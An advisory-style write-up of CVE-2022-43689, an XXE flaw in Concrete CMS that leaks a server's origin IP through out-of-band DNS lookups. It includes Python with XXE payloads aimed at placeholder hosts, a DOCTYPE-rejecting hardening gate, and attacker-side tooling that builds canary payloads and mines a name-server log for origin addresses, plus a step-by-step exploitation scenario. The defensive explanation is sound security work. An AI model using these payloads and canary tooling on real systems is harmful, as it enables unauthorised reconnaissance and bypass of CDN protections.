CVE-2022-43689 Concrete CMS is vulnerable to XXE DNS requests that disclose IPs.

The flaw is an XML External Entity (XXE) weakness: an XML parser in Concrete CMS (formerly concrete5) resolves external entities declared in attacker-supplied XML. If the entity's SYSTEM identifier names a host under a domain the attacker controls, for instance

www.example.com

then parsing the document makes the server's resolver look up that name, and the attacker, who runs the authoritative name server for the domain, sees the query together with the address it came from. That address is the public IP from which Concrete CMS resolves names (the server itself, or its recursive resolver), and it is disclosed even when the site is reachable only through a CDN or reverse proxy that hides the origin. Because the lookup happens while the DTD is processed, the entity's content never has to appear in the application's output for the leak to occur; a crafted document is enough.

The impact established by this advisory is IP disclosure. Further consequences sometimes reached through XXE, such as local file read, server-side request forgery or denial of service through entity expansion, require the parser to accept more than an external-entity lookup and are not established here.

Affected versions: Concrete CMS 8.5.9 and earlier, and 9.0.0 through 9.1.2. The next releases in each line, 8.5.10 and 9.1.3, are not affected.
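As an added example (not code from Concrete CMS or from the advisory), the following Python shows the payload shape this class of bug responds to, a pre-parse check that lists the hostnames an entity-resolving parser would look up for a given document, and the usual hardening gate for untrusted XML: refuse any DOCTYPE at all. The payloads and the hostnames oob.example.com and probe.example.net are constructed placeholders.

```python
import re
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

# Constructed XXE payloads of the shape that triggers an out-of-band DNS lookup.
# "oob.example.com" / "probe.example.net" are placeholders, not real attacker hosts.
# The parameter-entity form (%oob;) is resolved while the DTD itself is processed,
# so the lookup happens even if the application never echoes entity content.
XXE_PAYLOAD = """<?xml version="1.0"?>
<!DOCTYPE probe [
  <!ENTITY % oob SYSTEM "http://oob.example.com/x">
  %oob;
]>
<probe/>
"""

XXE_PAYLOAD_PUBLIC = (
    '<!DOCTYPE x [<!ENTITY e PUBLIC "-//X//Y" "https://probe.example.net/p">]>'
    "<x>&e;</x>"
)

BENIGN_XML = "<data><item>hello</item></data>"

ENTITY_RE = re.compile(
    r"""<!ENTITY\s+(?:%\s*)?[^\s>]+\s+            # entity name; parameter entities start with %
        (?:SYSTEM|PUBLIC\s+(?:"[^"]*"|'[^']*'))    # SYSTEM, or PUBLIC followed by its public id
        \s+(?:"([^"]*)"|'([^']*)')                 # the system literal: the URI the parser would fetch
    """,
    re.IGNORECASE | re.VERBOSE,
)


def external_entity_uris(xml_text: str) -> list[str]:
    """Every external (SYSTEM/PUBLIC) entity URI declared in the document, in order."""
    return [m.group(1) if m.group(1) is not None else m.group(2)
            for m in ENTITY_RE.finditer(xml_text)]


def dns_lookups_triggered(xml_text: str) -> list[str]:
    """Hostnames a parser that resolves external entities would query DNS for.
    Only network schemes count; a file:// entity is still XXE but makes no lookup."""
    hosts = set()
    for uri in external_entity_uris(xml_text):
        parts = urlsplit(uri)
        if parts.scheme in ("http", "https", "ftp") and parts.hostname:
            hosts.add(parts.hostname)
    return sorted(hosts)


def is_safe_to_parse(xml_text: str) -> bool:
    """Hardening gate for untrusted XML: refuse any document carrying a DOCTYPE.
    Rejecting the DTD wholesale (rather than only external entities) also stops
    internal-entity expansion attacks and costs nothing for ordinary data documents."""
    return re.search(r"<!DOCTYPE", xml_text, re.IGNORECASE) is None


def parse_untrusted_xml(xml_text: str) -> ET.Element:
    """Parse only after the gate. ElementTree itself never fetches external entities,
    but the gate keeps that property independent of the underlying parser's defaults."""
    if not is_safe_to_parse(xml_text):
        uris = external_entity_uris(xml_text)
        raise ValueError(f"refusing XML with a DOCTYPE (external entities: {uris or 'none'})")
    return ET.fromstring(xml_text)


if __name__ == "__main__":
    for doc in (XXE_PAYLOAD, XXE_PAYLOAD_PUBLIC, BENIGN_XML):
        print(is_safe_to_parse(doc), dns_lookups_triggered(doc))
```

In PHP, which Concrete CMS runs on, the equivalent hardening is to avoid passing LIBXML_NOENT or LIBXML_DTDLOAD when loading untrusted XML through DOMDocument or SimpleXML and, on libxml2 versions older than 2.9 where external entity loading was enabled by default, to call libxml_disable_entity_loader(true). That describes the general PHP mechanism, not the specific change made in Concrete CMS.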

Operation Scenarios

Exploitation of this flaw could proceed as follows:

1. The attacker controls a domain (www.example.com stands in for it here) and runs its authoritative name server, logging every query for names under it together with the querying address.
2. The attacker submits to the Concrete CMS instance an XML document declaring an external entity whose URI points at a unique subdomain of that domain.
3. When Concrete CMS parses the document, its resolver queries the attacker's name server for that subdomain. The source address of the query reveals the public IP from which the CMS resolves names, even if the site is otherwise reachable only through a CDN or reverse proxy.
4. With the origin address known, the attacker can reach the server directly rather than through its front-end protections, for instance to probe it for further weaknesses or to direct denial-of-service traffic at it, bypassing whatever filtering the front end provides.
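The scenario above from the attacker's side, as an added example that is not part of the advisory: a per-probe canary hostname is generated, embedded in a blind XXE document, and later matched against the attacker's name-server query log to recover the address the lookup came from. The zone oob.example.com, the log lines (modelled on the layout of BIND's query log) and the addresses 203.0.113.10 and 198.51.100.7 are all constructed. The caveat the practitioner needs is in origin_ips_for: the address seen in DNS is that of whatever resolver the CMS host uses, which is the origin's own address only when it resolves directly or through a resolver sharing its egress.

```python
import re
import secrets

# Placeholder attacker zone; the real one would be a domain whose authoritative
# name server the attacker operates and logs.
OOB_ZONE = "oob.example.com"


def make_canary(zone: str = OOB_ZONE) -> str:
    """A unique per-probe hostname, so one logged lookup maps to exactly one target."""
    return f"{secrets.token_hex(4)}.{zone}"


def build_xxe_payload(canary_host: str) -> str:
    """Blind XXE document: the parameter entity is resolved while the DTD is processed,
    so parsing alone causes the lookup; nothing has to be reflected in a response."""
    return (
        '<?xml version="1.0"?>\n'
        f'<!DOCTYPE probe [ <!ENTITY % oob SYSTEM "http://{canary_host}/"> %oob; ]>\n'
        "<probe/>\n"
    )


# Constructed query-log lines in the layout BIND's query log uses
# ("client <addr>#<port> (<name>): query: <name> IN <type> ...").
# 203.0.113.10 plays the address the CMS host's lookups arrive from;
# 198.51.100.7 is unrelated traffic to the same name server.
CANARY = "deadbeef.oob.example.com"
SAMPLE_QUERY_LOG = [
    "14-Nov-2022 23:15:01.123 client @0x7f3a 203.0.113.10#51234 (deadbeef.oob.example.com): "
    "query: deadbeef.oob.example.com IN A +E(0)K (198.51.100.5)",
    "14-Nov-2022 23:15:01.125 client @0x7f3a 203.0.113.10#51235 (deadbeef.oob.example.com): "
    "query: deadbeef.oob.example.com IN AAAA +E(0)K (198.51.100.5)",
    "14-Nov-2022 23:15:02.001 client @0x7f3b 198.51.100.7#40001 (www.example.com): "
    "query: www.example.com IN A + (198.51.100.5)",
]

QUERY_RE = re.compile(
    r"client (?:@0x[0-9a-f]+ )?(?P<ip>[0-9a-fA-F.:]+)#\d+ \([^)]*\): "
    r"query: (?P<qname>\S+) IN (?P<qtype>\S+)"
)


def origin_ips_for(canary_host: str, log_lines: list[str]) -> list[str]:
    """Source addresses that asked the attacker's name server for the canary.
    Caveat: this is the address of whatever resolver the CMS host uses. If it
    resolves through a public resolver, the attacker learns that resolver's
    address, not the origin's; the follow-up HTTP fetch of the entity, if the
    parser gets that far, does come from the host's own egress address."""
    seen: list[str] = []
    for line in log_lines:
        m = QUERY_RE.search(line)
        if m and m["qname"].rstrip(".").lower() == canary_host.lower() and m["ip"] not in seen:
            seen.append(m["ip"])
    return seen


if __name__ == "__main__":
    print(build_xxe_payload(make_canary()))
    print("origin candidates:", origin_ips_for(CANARY, SAMPLE_QUERY_LOG))
```

Generating a fresh canary per submission is what lets one name server serve many targets at once: the label, not the source address, tells the attacker which CMS instance answered.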

Timeline

Published on: 11/14/2022 23:15:00 UTC
Last modified on: 11/17/2022 04:57:00 UTC
